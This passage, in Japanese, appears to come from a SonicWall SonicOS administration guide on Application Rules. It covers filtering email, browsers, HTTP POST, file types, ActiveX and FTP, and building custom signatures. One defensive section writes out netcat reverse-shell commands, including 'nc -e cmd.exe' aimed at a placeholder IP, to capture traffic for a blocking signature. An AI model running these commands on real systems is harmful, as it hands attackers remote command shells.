ホストされる電子メール環境ホストされる電子メール環境とは、ユーザのインターネットサービスプロバイダ (ISP) において電子

メールが利用可能な環境です。通常、この環境の電子メール転送用プロトコルには POP3 が使用され

ます。多くの小規模企業のオーナは、このモデルを使用していて、電子メール添付ファイルだけでなく電子メールコンテンツも制御したいと考えています。ゲートウェイ上でアプリケーションルール

を実行することで、 SMTP ベースの電子メールに加えて POP3 ベースの電子メールを制御するためのソ

リューションが提供されます。

アプリケーションルールでは HTTP もスキャンできるので、 Yahoo や Gmail などのサイトでホストさ

れる電子メールにも有用です。 HTTP を使用しているときに添付ファイルが遮断された場合、アプリ

ケーションルールは遮断されたファイルの名前を示しません。また、アプリケーションルールを使

用して、データベースサーバにアクセスするときに FTP を制御することもできます。

専用の SMTP ソリューションとしては、 SonicWall Email Security を利用できます。 Email Security は、

SMTP ベースの電子メールの制御用に多くの大企業で採用されていますが、 POP3 をサポートしていま

せん。複数の電子メールプロトコルの制御用として、アプリケーションルールは優れたソリュー

ションを提供します。



電子メール制御アプリケーションルールは、特に包括的なポリシーが必要な場合に、特定のタイプの電子メール制

御に効果を発揮します。例えば、特定の形式 (.exe など) の添付ファイルの送信をユーザごとまたは

ドメイン全体で禁止できます。このケースではファイル名の拡張子を照合するため、添付ファイルの送信前に拡張子を変更すると、フィルタを回避します。電子メールサーバを所有している場合は電

子メールサーバ上でもこの方法で添付ファイルを防ぐことができます。そうでない場合は、アプリ

ケーションルールがその機能を提供します。

ファイル内容から“社外秘"、 “社内限定使用"、 “機密"などに一致する文字列をスキャンする一致オブ

ジェクトを作成して、機密データの転送に関する基本的な制御を実現できます。

また、特定のドメインまたはユーザとの間の電子メールの送受信を禁止するポリシーを作成することもできます。アプリケーションルールを使用すると、添付ファイルの数を制限することなく電子

メールファイルサイズを制限できます。アプリケーションルールでは、 MIME タイプに基づいて

ファイルを遮断できます。暗号化された SSL または TLS トラフィックは遮断できず、また、すべての

暗号化ファイルを遮断することはできません。 HTTPS を使っているサイトからの暗号化された電子

メールを遮断するために、 HTTPS セッションを開始する前に送信される証明書を照合する個別一致オ

ブジェクトを作成できます。これは、暗号化される前の SSL セッションの一部です。それから、証明

書を遮断する個別ポリシーを作成します。

アプリケーションルールでは、電子メールのテキストベースの添付ファイルまたは 1 レベル圧縮され

た添付ファイルをスキャンできますが、暗号化された添付ファイルはスキャンできません。次の表に、アプリケーションルールでキーワードをスキャンできるファイル形式を示します。他の形式に

ついては、ポリシー内で使用する前にテストする必要があります。

キーワードをスキャン可能なファイル形式

ファイルタイプ一般的な拡張子

C ソースコード c

C+ソースコード cpp

カンマ区切り値 csv

HQX アーカイブ hqx

HTML htm

Lotus 1-2-3 wks

Microsoft Access mdb

Microsoft Excel xls

Microsoft PowerPoint ppt

Microsoft Visio vsd

Microsoft Visual Basic vbp

Microsoft Word doc

Microsoft Works wps

Portable Document Format pdf

リッチテキスト形式 rtf

SIT アーカイブ sit

テキストファイル txt

WordPerfect wpd

XML xml



ウェブブラウザ制御アプリケーションルールを使用すると、望ましくないブラウザからウェブサーバを保護することも

できます。アプリケーションルールには、 Netscape、 MSIE、 Firefox、 Safari、および Chrome 用の一致

オブジェクトタイプが用意されています。これらのタイプのいずれかを使用して一致オブジェクト

を定義し、ポリシー内でオブジェクトを参照することで、該当するブラウザを遮断できます。

また、 HTTP ユーザエージェント一致オブジェクトタイプを使用すると、ブラウザバージョン情報に

アクセスできます。例えば、バージョンが古いブラウザは、どのブラウザであってもセキュリティ上の問題がある可能性があります。アプリケーションルールを使用すると、問題があるブラウザ

(Internet Explorer など) からのアクセスを禁止するポリシーを作成できます。さらに、不一致検索を使

用して、目的のブラウザ以外のすべてのブラウザを除外することもできます。例えば、 InternetExplorer のバージョン 9 には欠陥があり、バージョン 11 についてはまだテストしていないという理由

で、 Internet Explorer バージョン 10 のみを許可するように設定できます。これを実現するには、

Wireshark のようなネットワークプロトコルアナライザを使用して、 IEv6 のウェブブラウザ識別子

(MSIE 10) を調べます。次に、コンテンツに“MSIE 10"を指定し、不一致検索を有効に設定した HTTPユーザエージェントタイプの一致オブジェクトを作成します。

この一致オブジェクトをポリシー内で使用すると、 MSIE 10 以外のブラウザを遮断できます。

Wireshark を使用してウェブブラウザ識別子を調べる方法については、 Wireshark (46 ページ) を参照し

てください。不一致検索については、不一致検索について (160 ページ) を参照してください。

ウェブブラウザアクセスの制御に関するもう 1 つの使用事例は、外国からのディスカウント商品を

販売する小規模の e コマースサイトがあります。サプライヤとの契約において輸入元の国に在住する

Tar アーカイブ (“tarball") tar

ZIP アーカイブ zip、 gzip

キーワードをスキャン可能なファイル形式

ファイルタイプ一般的な拡張子



ユーザには販売できないことが規定されている場合、主要なウェブブラウザの国内バージョンから

のアクセスを遮断するようにアプリケーションルールを設定できます。

アプリケーションルールは、一般的な各種ブラウザの定義済み選択をサポートします。さらに、個

別一致オブジェクトとして他のブラウザを追加できます。ブラウザの遮断は、ブラウザから報告される HTTP ユーザエージェントに基づいて行われます。個別一致オブジェクトには、ブラウザを正確に

識別するのに十分なコンテンツを含める必要があります。 Wireshark またはその他のネットワークプロトコルアナライザを使用すると、目的のブラウザの一意なシグネチャを取得できます。

HTTP POST 制御HTTP POST メソッドを禁止することによって、読み取り専用の公開 HTTP サーバのセキュリティを強

化できます。

HTTP POST を禁止するには:

1 メモ帳などのテキストエディタを使用して、以下の HTML コードが含まれる Post.htm という名

前の新しいドキュメントを作成します。

<FORM action="http://www.yahoo.com/" method="post"><p>Please enter your name: <input type="Text" name="FullName"></p><input type="submit" value="Submit"> <INPUT type="reset">

2 このファイルをデスクトップなどの都合のいい場所に保存します。

3 Wireshark ネットワークアナライザを開き、キャプチャを開始します。 Wireshark の使用法につ

いては、 Wireshark (46 ページ) を参照してください。

4 先ほど作成した Post.htm ファイルをブラウザで開きます。

5 自分の名前を入力します。

6 「適用」を選択します。キャプチャを終了します。

7 Wireshark の「Edit > Find Packet」機能を使用して、 POST という文字列を検索します。

Wireshark は、要求されたデータが含まれる初のフレームに移動します。 Wireshark の画面に

示すような画面が表示されます。この画面は、 HTTP POST メソッドが TCP ヘッダー情報の直後

に送信されていること、および TCP ペイロード (HTTP アプリケーション層) の初の 4 バイト

(504f5354) で構成されていることを示しています。この情報を基に、 HTTP POST メソッドを

検出する個別一致オブジェクトを作成します。



Wireshark の画面

8 SonicOS 管理インターフェース管理ビューで、「ポリシー | オブジェクト > 一致オブジェクト」

に移動します。

9 「追加」を選択し、「一致オブジェクト」を選択します。

10 次に示すような一致オブジェクトを作成します。

この特定の一致オブジェクトでは、「設定を有効にする」機能を使用して、ペイロードの特定の部分を照合するオブジェクトを作成します。「オフセット」フィールドでは、ペイロード内のどのバイトから照合を開始するかを指定し、照合をより限定的にすることで誤検出を小限にします。「深度」フィールドでは、どのバイトで照合を終了するかを指定します。「小値」フィールドと「大値」フィールドでは、小ペイロードサイズと大ペイロードサイ

ズを指定できます。

11 管理ビューで、「ポリシー | ルール > アプリケーションルール」を開きます。




13 次に示すようなポリシーを作成します。

14 テストのために、前に作成した Post.htm ファイルをブラウザで開きます。

15 自分の名前を入力します。

16 「適用」を選択します。今回は接続が遮断され、次に示すような警告がログに表示されるはずです。

禁止するファイルタイプ制御アプリケーションルールを使用すると、危険なファイルタイプや禁止されたファイルタイプ (exe、vbs、 scr、 dll、 avi、 mov など) のアップロードやダウンロードを防止できます。

危険なファイルタイプや禁止されたファイルタイプのアップロードまたはダウンロードを

防止するには、以下の手順に従います。

1 管理ビューで、「オブジェクト > 一致オブジェクト」に移動します。

2 「追加」を選択し、「一致オブジェクト」を選択します。



3 次に示すようなオブジェクトを作成します。

4 「オブジェクト > 動作オブジェクト」に移動します。


6 次に示すような動作を作成します。

このオブジェクトと動作を使用するポリシーを作成するには、以下の手順に従います。

1 「ルール > アプリケーションルール」に移動します。


3 次に示すようなポリシーを作成します。



4 このポリシーをテストするために、ウェブブラウザを開いて、一致オブジェクトで指定した任

意のファイルタイプ (exe、 vbs、 scr) をダウンロードしてみます。次のような URL で試すこ

とができます。

〈http://download.skype.com/SkypeSetup.exe〉

〈http://us.dl1.yimg.com/download.yahoo.com/dl/msgr8/us/msgr8us.exe〉

〈http://g.msn.com/8reen_us/EN/INSTALL_MSN_MESSENGER_DL.EXE〉

次に示すような警告が表示されます。

ActiveX コントロールアプリケーションルールのも有用な機能の 1 つは、異なるタイプの ActiveX または Flash ネットワー

クトラフィックを識別する機能です。これにより、ゲームを遮断する一方で、 Windows アップデー

トを許可できます。アプリケーションルールを導入する前は、「セキュリティサービス > コンテン

ツフィルタ」を使用して ActiveX を遮断するように SonicOS を設定できましたが、この方法ではソフ

トウェア更新を含むすべての ActiveX コントロールが遮断されました。



アプリケーションルールでは、 HTML ソース内のクラス ID の値をスキャンすることで、この識別が

可能になっています。 ActiveX のそれぞれのタイプは独自のクラス ID を持ち、同一のアプリケーショ

ンであってもバージョンが異なればクラス ID も異なる場合があります。

Active X のタイプとクラス ID に、いくつかの ActiveX タイプとそのクラス ID を示します。

ActiveX の一致オブジェクトは、 Macromedia Shockwave のクラス ID を使用している ActiveX タイプの一

致オブジェクトを示しています。この一致オブジェクトを使用するポリシーを作成することで、オンラインゲームやその他の Shockwave ベースのコンテンツを遮断できます。

ActiveX の一致オブジェクト

これらの ActiveX コントロールのクラス ID は、インターネット上で参照できます。また、ブラウザに

ソースを表示して調べることもできます。例えば、クラス ID が含まれるソースファイルの例に示す

ソースファイルには、 Macromedia Shockwave または Flash のクラス ID が含まれています。

Active X のタイプとクラス ID

ActiveX タイプクラス ID

Apple Quicktime 02BF25D5-8C17-4B23-BC80-D3488ABDDC6B

Macromedia Flash v6、 v7 D27CDB6E-AE6D-11cf-96B8-444553540000

Macromedia Shockwave D27CDB6E-AE6D-11cf-96B8-444553540000

Microsoft Windows Media Player v6.4 22d6f312-b0f6-11d0-94ab-0080c74c7e95

Microsoft Windows Media Player v7～10 6BF52A52-394A-11d3-B153-00C04F79FAA6

Real Networks Real Player CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA

Sun Java Web Start 5852F5ED-8BF4-11D4-A245-0080C6F74284



クラス ID が含まれるソースファイルの例

FTP 制御アプリケーションルールは、 FTP コマンドとファイル内容一致オブジェクトタイプを使用して、 FTPの制御チャンネル、 FTP アップロードとダウンロードに対する制御を提供します。これらを使用する

ことで、 FTP の使用を効果的に制限できます。このセクションでは、以下の 2 つの使用事例を紹介し

ます。

• 機密ファイルの FTP 送信の遮断 (64 ページ)

• 送信 UTF-8/UTF-16 エンコードファイルの遮断 (66 ページ)

• FTP コマンドの遮断 (68 ページ)

機密ファイルの FTP 送信の遮断

例えば、 FTP による機密ファイルの送信を遮断するには、ファイル内のキーワードまたはパターンに

基づいてポリシーを作成します。



送信機密ファイルを遮断するには、以下の手順に従います。

1 ファイル内のキーワードに一致するファイル内容タイプの一致オブジェクトを作成します。

必要に応じて、メッセージをクライアントに送信する、カスタマイズされた FTP 通知動作を作

成します。

2 この一致オブジェクトと動作を参照するポリシーを作成します。ファイル転送を遮断して接続をリセットすることだけを目的とする場合は、ポリシーを作成するときにリセット /破棄動作




送信 UTF-8/UTF-16 エンコードファイルの遮断

アプリケーションルールによる Unicode UTF-8 および UTF-16 のネイティブサポートにより、漢字やか

な文字など、エンコードされたマルチバイト文字を英数字入力によって一致オブジェクトのコンテンツキーワードとして入力することができます。アプリケーションルールは、ウェブページや電子

メールアプリケーションに通常見られる UTF-8 エンコードコンテンツや、 Windows OS/Microsoft オフィスベースのドキュメントに通常見られる UTF-16 エンコードコンテンツのキーワードマッチング

をサポートしています。

独自 Unicode ファイルの送信ファイル転送の遮断は、他の機密ファイル転送の遮断と同じように処理

されます。

1 ファイル内の UTF-8 または UTF-16 でエンコードされたキーワードに一致する一致オブジェクト

を作成します。

2 この一致オブジェクトを参照して一致するファイルの転送を遮断するポリシーを作成します。



次の例では、ファイル内容一致オブジェクト種別に対し、 "機密文書" を意味する、 UTF-16 でエ

ンコードされた中国語のキーワードを使用しています。

3 以下に示すように、この一致オブジェクトを参照するポリシーを作成します。このポリシーは、ファイル転送を遮断し、接続をリセットします。「ログを有効にする」を選択しているのは、 UTF-16 でエンコードされたキーワードを含むファイルを転送しようとする試みをログに残

すためです。



接続のリセット /破棄の後には、ログエントリが生成されます。以下に示すログエントリの例には、

アプリケーション制御の警告であることを示すメッセージのほか、ポリシー名とリセット /破棄

(Reset/Drop) という動作種別が表示されています。

FTP コマンドの遮断

アプリケーションルールを使用して、 put、 mput、 rename_to、 rename_from、 rmdir、 mkdir などのコ

マンドを遮断することにより、 FTP サーバを読み取り専用に設定できます。この使用事例では、 putコマンドのみを含んだ一致オブジェクトを示しますが、これらすべてのコマンドを同じ一致オブジェクトに含めることができます。

FTP コマンドを遮断するには、以下の手順に従います。

1 put コマンドに一致する一致オブジェクトを作成します。 mput コマンドは put コマンドの変種

なので、 put コマンドに一致する一致オブジェクトは mput コマンドにも一致します。



2 必要に応じて、メッセージをクライアントに送信する、カスタマイズされた FTP 通知動作を作

成することができます (以下の例を参照)。



3 この一致オブジェクトと動作を参照するポリシーを作成します。 put コマンドを遮断して接続を

リセットすることだけを目的とする場合は、ポリシーを作成するときにリセット /破棄動作を

選択します。

帯域幅管理アプリケーション層帯域幅管理を使用すると、特定の種類のファイルを転送するために使用できるネットワーク帯域幅を制御できます。これにより、ネットワーク上の非生産的なトラフィックを抑制し、生産的なトラフィックを奨励できます。

例えば、 FTP 上で MP3 ファイルをダウンロードするために使用される帯域幅を 400 Kbps 以下に制限す

ることが可能です。 MP3 ファイルをダウンロードしているユーザが 1 人であっても 100 人であって

も、このポリシーによって合計帯域幅が 400 Kbps に制限されます。

帯域幅管理の設定については、『SonicOS セキュリティ設定』技術ドキュメントの「ファイアウォー

ル設定 > 帯域幅管理」を参照してください。

DPI を迂回するアクセスされるコンテンツが安全であることがわかっている場合、「DPI をバイパスする」動作を作

成すると、ネットワークのパフォーマンスを向上させることができます。例えば、従業員がウェブ

サーバ上の URL にアクセスすることで、 HTTP 経由でストリーム配信される社内向けのビデオがこの

ケースに該当します。コンテンツは安全であることがわかっているため、このビデオへのすべてのア



クセスに「DPI をバイパスする」動作を適用するアプリケーションルールポリシーを作成できます。

これにより、ビデオにアクセスする従業員向けに、高速なストリーミング速度と優れた表示品質を実現できます。

このポリシーは次の 2 つの手順で作成できます。

1 「HTTP URI コンテンツ」という一致オブジェクト種別を使用して、社内向けビデオ用の一致オ

ブジェクトを定義します。

2 Corporate Video 一致オブジェクトと「DPI をバイパス」動作を使用するポリシーを作成します。

ヒント： URI コンテンツ一致オブジェクトの完全一致タイプおよび前方一致タイプには、

必ず URL の先頭のスラッシュ (/) を含める必要があります。「内容」フィールドに www.company.com などのホストヘッダーを含める必要はありません。



個別のシグネチャアプリケーションルールに定義済みのオブジェクトのタイプが用意されていないトラフィックを制

御する場合は、パケットの任意の部分に一致する個別一致オブジェクトを作成できます。これにより、任意のネットワークプロトコルに対して個別のシグネチャを作成できます。

例えば、 HTTP GET 要求のパケットに一致する個別のシグネチャを作成できます。ローカルエリア

ネットワークからのウェブ閲覧を防ぐためにこれを使用することもあります。

HTTP GET パケットの一意な識別子を調べるには、 Wireshark ネットワークプロトコルアナライザを使

用してパケットヘッダーをチェックします。 Wireshark の使用法の詳細については、 Wireshark (46ページ) を参照してください。 Wireshark では、関心のあるトラフィックが含まれるいくつかのパケッ

トをキャプチャします。この例では、 HTTP GET 要求パケットをキャプチャするとします。任意の

ウェブブラウザを使用して HTTP GET 要求を生成できます。 Wireshark に表示された HTTP GET 要求パ

ケットに、 Wireshark で HTTP GET 要求パケットを表示した画面を示します。



Wireshark に表示された HTTP GET 要求パケット

ネットワークプロトコルに対して個別のシグネチャを作成するには:

1 Wireshark の上部ペインで下にスクロールして HTTP GET パケットを探します。

2 その行を選択します。

下部の 2 つのペインに対象のパケットが表示されます。中央ペインには SYN パケットのパケッ

トヘッダーが人間が読み取れる形式で表示されます。実際のヘッダーバイトは、 16 進形式で

下部のペインに表示されます。

3 中央ペインで、「Hypertext Transfer Protocol」セクションを展開してパケットペイロードを表

示します。

4 アプリケーションルールで参照する識別子を見つけます。この例では、目的の識別子は初の

3 バイトに含まれる GET コマンドです。

5 この識別子を選択して、下部ペイン内の対応するバイトを強調表示します。

6 下部ペイン内で強調表示されたバイトのオフセットと深度を調べることができます。

• オフセットは、パケット内で照合を開始するバイトを示します。

• 深度は、照合を終了する後のバイトを示します。



オフセットを使用することで、非常に限定的な照合を行い、誤検出を小限にすることができます。オフセットと深度の計算には、 16 進数ではなく 10 進数を使用します。

個別一致オブジェクトに関連付けられるオフセットと深度は、パケットペイロード (TCP または

UDP ペイロードの開始位置) を起点として計算されます。この例では、オフセットが 1 (10 進)、深

度が 3 です。

7 この情報を使用する個別一致オブジェクトを作成します。

8 「一致オブジェクトの設定」ダイアログで、オブジェクトに対するわかりやすい名前を「オブジェクト名」フィールドに入力します。

9 「一致オブジェクト種別」ドロップダウンメニューから「個別オブジェクト」を選択します。

10 「設定を有効にする」チェックボックスをオンにします。

11 「オフセット」フィールドに、「1」 (識別子の開始バイト ) と入力します。

12 「深度」テキストボックスに、「3」 (識別子の終了バイト ) と入力します。

13 「ペイロードサイズ」は既定値のままにしておきます。「ペイロードサイズ」はパケット内の

データの量を示すために使用しますが、ここではパケットヘッダーだけに注目します。

14 「入力形式」で、「16 進数」を選択します。

15 「内容」テキストボックスに、 Wireshark に表示されたバイト数「474554」を入力します。 16進コンテンツ内ではスペースを使用しないでください。

メモ：オフセットと深度を計算するときは、パケット内の初のバイトが (0 ではなく ) 1としてカウントされます。



16 この一致オブジェクトはアプリケーションルールポリシーで使用します。

a 「アプリケーション制御ポリシーの設定」ダイアログで、わかりやすいポリシー名を入力します。

b ポリシー種別で「HTTP クライアント要求」を選択します。

c 「一致オブジェクト」ドロップダウンメニューで、定義した一致オブジェクトを選択し

ます。

d 個別動作または「リセット /破棄」などの既定動作を選択します。

e 「接続側」で、「クライアント側」を選択します。

f 他の設定についても変更できます。ポリシーの作成の詳細については、アプリケーションルールポリシーの設定 (42 ページ) を参照してください。

リバースシェル悪用の防御アプリケーションルールの個別のシグネチャ機能 (個別のシグネチャ (72 ページ) を参照) を使用する

と、リバースシェル悪用攻撃を防ぐことができます。リバースシェル悪用は、攻撃者がゼロデイ

(Zero-day) 悪用によってシステムへの侵入に成功した場合に使用される可能性があります。ゼロデイ

悪用とは、そのシグネチャがまだセキュリティソフトウェアで認識されない攻撃のことです。

まだ知られていない初期の段階では、悪意のあるペイロードは防御の前線、つまりインターネット

ゲートウェイで実行されている IPS やゲートウェイアンチウイルス (GAV) を通過できます。さらに、



ホストベースのアンチウイルスソフトウェアなど、その次の防御線まで通過して、攻撃対象のシス

テムで任意のコードを実行できます。

多くの場合、実行されるコードには、攻撃者がリモートから (悪用するサービスやログオンユーザの

権限を使用して) コマンドプロンプトウィンドウを開き、そこから侵入に着手するために必要な小

限の命令が含まれています。

NAT/ファイアウォールがあると、悪用するシステムに能動的に接続できないことがあるので、それら

を迂回する一般的な手段として、攻撃者は脆弱なシステムにリバースシェルを実行させます。リ

バースシェルでは、攻撃対象のホストから攻撃者のアドレスに対して接続が開始されます。しか

も、厳格な送信ポリシーをうまく回避するために、既知の TCP/UDP ポートが使用されます。

この使用事例は、 Windows システムをホストしている環境で、すべての TCP/UDP ポートを介した暗号

化されていない接続をインターセプトする場合に適用できます。

この使用事例では、リバースシェルペイロードの特定の事例 (送信接続) を扱っていますが、受信接

続に対しても有効になるようにポリシーを設定すると安全性が向上します。これにより、実行されたペイロードが脆弱なホストにリスニングシェルを生成し、攻撃者が誤って設定されたファイア

ウォール経由でそのサービスに接続するような事例を防ぐことができます。

実際の設定では、次の作業を行う必要があります。

• netcat ツールを使用して、特徴を検出する実際のネットワーク活動を生成する

• Wireshark ツールを使用して活動をキャプチャし、ペイロードをテキストファイルにエクスポー

トする

• 誤検出を防げるだけの適度に具体的で一意な文字列を使用して、一致オブジェクトを作成する

• そのオブジェクトを含むペイロードが解析されたときに実行する動作を指定したポリシーを定義する (ここでは、既定のリセット /破棄を使用)

トピック :

• ネットワークアクティビティの生成 (76 ページ)

• Wireshark を使用したペイロードのキャプチャおよびテキストファイルへのエクスポート (77 ページ)

• 一致オブジェクトの作成 (77 ページ)

• ポリシーの定義 (78 ページ)

ネットワークアクティビティの生成

netcat ツールが備える多くの機能の 1 つに、プログラムの出力を送信接続またはリスニング接続にバ

インドする機能があります。次の使用例は、リスニング“コマンドプロンプトデーモン"を設定する

方法、またはリモートエンドポイントに接続して、対話型のコマンドプロンプトを提供する方法を

示しています。

• nc -l -p 23 -e cmd.exe

ポート 23 に接続するホストから Windows プロンプトを利用できるようになります (-l オプショ

ンは、既定の暗黙的な接続モードとは逆のリスンモードを表しています)。

• nc -e cmd.exe 44.44.44.44 23

メモ：暗号化されていない Telnet サービスを使用しているネットワークでは、それらのサーバ

の IP アドレスを除外するポリシーを設定する必要があります。



ホスト 44.44.44.44 が次の netcat コマンドを使用してポート 23 でリスンしている場合に、ホス

ト 44.44.44.44 から Windows プロンプトを利用できるようになります。

nc -l ー p 23

Wireshark を使用したペイロードのキャプチャおよびテキス

トファイルへのエクスポート

データをキャプチャするには、 Wireshark を起動し、「Capture > Interfaces」を選択してキャプチャダイアログを開きます。 netcat トラフィックを処理するインターフェースでキャプチャを開始します。

キャプチャを開始したらすぐに netcat コマンドを実行し、キャプチャを終了します。

Wireshark に表示されたネットワーク上のデータフローは、そのような接続時のネットワーク上の

データフローを示しています (Vista Enterprise、 2007 年 6 月)。

Wireshark に表示されたネットワーク上のデータフロー

16 進データをテキストファイルにエクスポートし、パケットヘッダー、不必要な部分や変化する部

分およびスペースを取り除きます。ここで関係があるのは Microsoft… reserved の部分です。こ

れには Wireshark の 16 進ペイロードエクスポート機能を使用します。 Wireshark については、

Wireshark (46 ページ) を参照してください。

一致オブジェクトの作成Vista のコマンドプロンプトバナーを表す一致オブジェクトのオブジェクト内容として、次の 16 進文

字を入力します。

4D6963726F736F66742057696E646F7773205B56657273696F6E20362E302E363030305D0D0A436F70797269676874202863292032303036204D6963726F73667420436F72706F726174696F6E2E

同じ方法で Windows 2000 および Windows XP のホストからも類似のエントリを取得し、それらを使用

して別の一致オブジェクトを作成します。次に示すような 3 つの一致オブジェクトが作成されます。

メモ：特徴のエクスポートと一致オブジェクトの定義に、実際には 16 進表記を使用する必要は

ありません (この例の実際のシグネチャは ASCII テキストです)。 16 進数はバイナリのシグネチャ

の場合にのみ必要です。



Windows Server 2003 やその他のバージョンの Windows の例も、ここで説明した方法で簡単に取得で

きます。

Linux/UNIX の管理者は、このシグネチャベースの防御を利用するために、既定の環境変数をカスタマ

イズする必要があります。通常、既定のプロンプトは、前述のように使用できるほど具体的でも一意でもありません。

ポリシーの定義一致オブジェクトを作成したら、そのオブジェクトを使用するポリシーを定義します。次の図は、他のポリシーの設定を示しています。この例の「ポリシー名」と「方向」の設定は、リバースシェル

専用になっています。前述のように、「方向」の設定を「両方」に変更し、より汎用的な名前を付けることで、適用範囲を広げることもできます。



接続のリセット /破棄後に、ネットワークアクセスの種別を示すログエントリが生成されます。接続

のリセット /破棄の後のログエントリに示すログエントリには、アプリケーション制御の警告である

ことを示すメッセージのほか、ポリシー名が表示されています。

接続のリセット /破棄の後のログエントリ

経験則として、適切なセキュリティ対策には多層のインテリジェンスが組み込まれており、ある 1 つの方法だけを悪意のあるコードに対する決定的な防御と見なすことはできません。



3

アプリケーション制御の設定

• 「ルールアプリケーション制御」 (80 ページ)


• アプリケーション制御の状況の表示 (83 ページ)

• アプリケーション制御のグローバル設定について (83 ページ)

• シグネチャの表示 (84 ページ)

• アプリケーション制御のグローバル設定の構成 (90 ページ)

• アプリケーション制御の種別ごとの設定 (95 ページ)

• アプリケーション制御のアプリケーションごとの設定 (97 ページ)

• シグネチャによるアプリケーション制御の設定 (99 ページ)

「ルールアプリケーション制御」

メモ：アプリケーション制御はライセンスされたサービスであり、この機能を使用するには該当するサービスを有効にする必要があります。


アプリケーション制御の設定80

「ルール > アプリケーション制御」ページでは、種別、アプリケーション、シグネチャを使用してグ

ローバルなアプリケーション制御ポリシーを設定できます。アプリケーションのある種別全体の遮断とログ記録を迅速に有効化したり、個々のアプリケーションや個々のシグネチャを容易に特定して同じ処理を実行したりできます。有効化すると、「ルール > アプリケーションルール」ページでポリ

シーを作成しなくても、種別、アプリケーション、またはシグネチャのグローバルな遮断またはログ記録が行われます。すべてのアプリケーション検出および防御の設定は「ルール > アプリケーション

制御」ページで利用できます。

このページでは次の設定を使用できます。

• 種別、アプリケーション、またはシグネチャを選択する。

• 遮断またはログ記録、あるいはこれら両方の動作を選択する。

• 動作に含めたり除外したりするユーザ、グループ、または IP アドレス範囲を指定する。

• 制御を執行するスケジュールを設定する。

これらのアプリケーション制御設定はアプリケーションルールポリシーとは独立したものですが、

ここで使用できる任意の種別、アプリケーション、またはシグネチャでアプリケーション一致オブジェクトを作成して、それらの一致オブジェクトをアプリケーションルールポリシーで使用するこ

ともできます。詳細については、アプリケーションリストオブジェクトについて (161 ページ) およ

びアプリケーションリストオブジェクトの設定 (165 ページ) を参照してください。

ビデオ：アプリケーション制御の設定例を示す情報ビデオがオンラインで提供されています。https://www.sonicwall.com/support/video-tutorials



https://www.sonicwall.com/support/video-tutorials

トピック :


• アプリケーション制御の状況の表示 (83 ページ)

• アプリケーション制御のグローバル設定について (83 ページ)

• シグネチャの表示 (84 ページ)

• アプリケーション制御のグローバル設定の構成 (90 ページ)

• アプリケーション制御の種別ごとの設定 (95 ページ)

• アプリケーション制御のアプリケーションごとの設定 (97 ページ)

• シグネチャによるアプリケーション制御の設定 (99 ページ)

アプリケーション制御ポリシーの作成について「ルール > アプリケーション制御」ページの設定手法では、特定の種別、アプリケーション、または

シグネチャをきめ細かく制御できます。これには、きめ細かなログ制御や、ユーザ、グループ、または IP アドレス範囲の包含および除外、スケジュールのきめ細かな設定が含まれます。ここでの設定

はグローバルなポリシーであり、どんな個別のアプリケーションルールポリシーからも独立してい

ます。

このページでは次の設定を使用できます。

• 種別、アプリケーション、またはシグネチャを選択する。

• 遮断またはログ記録、あるいはこれら両方の動作を選択する。

• 動作に含めたり除外したりするユーザ、グループ、または IP アドレス範囲を指定する。

• 制御を執行するスケジュールを設定する。

これらのアプリケーション制御設定はアプリケーションルールポリシーとは独立したものですが、

ここの場所または「オブジェクト > 一致オブジェクト」ページで使用できる任意の種別、アプリケー

ション、またはシグネチャでアプリケーション一致オブジェクトを作成して、それらの一致オブジェクトをアプリケーションルールポリシーで使用することもできます。これにより、アプリケーショ

ンルールで設定できる動作やその他の多様な設定を使用できます。アプリケーションルールに関す

るこうしたポリシーベースのユーザインターフェースの詳細については、アプリケーションリスト

オブジェクトについて (161 ページ) を参照してください。



アプリケーション制御の状況の表示アプリケーション制御の状況の情報は、「ポリシー | ルール > アプリケーション制御」ページに表示

されます。

「アプリケーション制御の状況」セクションは、シグネチャデータベースに関する情報を表示し、

データベースを更新できます。

ゾーンごとにアプリケーション制御を有効にするには、「アプリケーション制御の状況」セクションの「ネットワーク >ゾーン」ページへのリンクをクリックします。

アプリケーション制御のグローバル設定について

「ルール > アプリケーション制御 l」ページには、次のグローバル設定が含まれています。

• アプリケーション制御を有効にする - アプリケーション制御はライセンスされたサービスであ

り、この機能を有効にする必要があります。「ネットワーク > ゾーン」ページからゾーンごと

に有効にする必要があります。

アプリケーションシグネチャデータベース

アプリケーションシグネチャデータベースがダウンロード済み

かどうかを示します。

アプリケーションシグネチャデータベースタイムスタンプ

アプリケーションシグネチャデータベースがダウンロードされ

た UTC 日時を表示します。

アプリケーションシグネチャデータベースを更新するには、

「更新」ボタンを選択します。

終確認 SonicOS がアプリケーションシグネチャデータベースの更新の

有無をチェックした終日時を表示します。

アプリケーションシグネチャデータベースの有効期限

アプリケーションシグネチャデータベースの有効期限が切れる

日を表示します。



• すべてのアプリケーションをログする - 有効にすると、アプリケーション制御とアプリケーショ

ンルールのポリシーの一致と処理が記録されます。

• グローバルログ冗長フィルタ間隔 - 同じポリシー一致の複数の発生が繰り返し記録され

ない間隔 (秒単位)。範囲は 0～99999 秒で、既定値は 60 秒です。

グローバルログ冗長設定は、すべてのアプリケーション制御のイベントに適用されま

す。ゼロに設定した場合、通過トラフィック内で検知されたポリシーの一致ごとに 1 つのログエントリが作成されます。その他の値は、同じポリシーでの一致に対するログ

エントリ間の小秒数を指定します。例えば、ログ冗長設定として 10 を指定した場

合、それぞれのポリシーの一致に対して 10 秒ごとに 1 つのメッセージが作成されます。

ログの冗長性も設定できます。

• 「アプリケーション制御ポリシーの編集」ダイアログで、ポリシーごとに設定します。

• 「アプリケーション制御種別の編集」ダイアログで、種別ごとに設定します。

• 「アプリケーション制御アプリケーションの編集」ダイアログで、アプリケーションごとに設定します。

それぞれのポリシー設定に対して行われるポリシー単位のログ冗長フィルタ設定は、グローバルログ冗長フィルタ設定よりも優先されます。

• アプリケーション制御の設定 - アプリケーション制御除外リストを有効にする方法を提供し

ます。

• アプリケーション制御の設定とポリシーをリセット - すべてのアプリケーション制御の設定と

ポリシーを工場出荷時の既定値にリセットしますが、初に警告ダイアログが表示され、「OK」または「キャンセル」を選択する必要があります。

シグネチャの表示

「アプリケーション制御詳細」の表示を各種の「表示形式」で変更できます。

表示形式オプション表示対象

種別すべて (既定) すべての種別とそのシグネチャアプリケーション

個々の種別指定した種別のシグネチャアプリケーション

アプリケーション

すべて (既定) 指定した種別に関連付けられているすべてのシグネチャアプ

リケーション



「検索するシグネチャ ID」フィールドに ID を入力して、特定のシグネチャの「アプリケーション制

御シグネチャの編集」ダイアログを表示することもできます。

トピック :

